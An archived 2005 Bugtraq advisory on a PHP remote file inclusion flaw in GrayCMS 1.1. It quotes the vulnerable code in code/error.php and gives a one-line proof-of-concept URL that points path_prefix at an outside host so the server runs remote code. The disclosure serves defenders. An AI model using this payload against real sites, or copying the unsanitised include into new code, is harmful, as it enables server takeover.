[38601] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

GrayCMS php code injection

daemon@ATHENA.MIT.EDU (Kold)
Tue Apr 26 15:27:20 2005

Date: 26 Apr 2005 11:45:32 -0000
Message-ID: <20050426114532.12588.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Kold <maggik@gala.net>
To: bugtraq@securityfocus.com



Version:  1.1
Severity: High
Vendor:   http://gcms.graymur.net/

Vulnerable code is in "code/error.php":

<----begin---->
...
if (!isset($page)) $page = '';
if (!isset($path_prefix)) $path_prefix = '../';
if (empty($main)) {
  require $path_prefix.'code/main.dat';
}
if (isset($e404) or isset($_GET['e404'])) {

...
}
if (isset($e403) or isset($_GET['e403'])) {
...
}

require $path_prefix.'code/blocks.php';
exit;
<----end---->


PoC: 
http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/
 
mail me:    maggik <at> gala <dot> net
icq:        3316667
greetz to:  ghc, 0xdeadbabe, unl0ck & others


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[38601] in bugtraq

GrayCMS php code injection

daemon@ATHENA.MIT.EDU (Kold)Tue Apr 26 15:27:20 2005

daemon@ATHENA.MIT.EDU (Kold)
Tue Apr 26 15:27:20 2005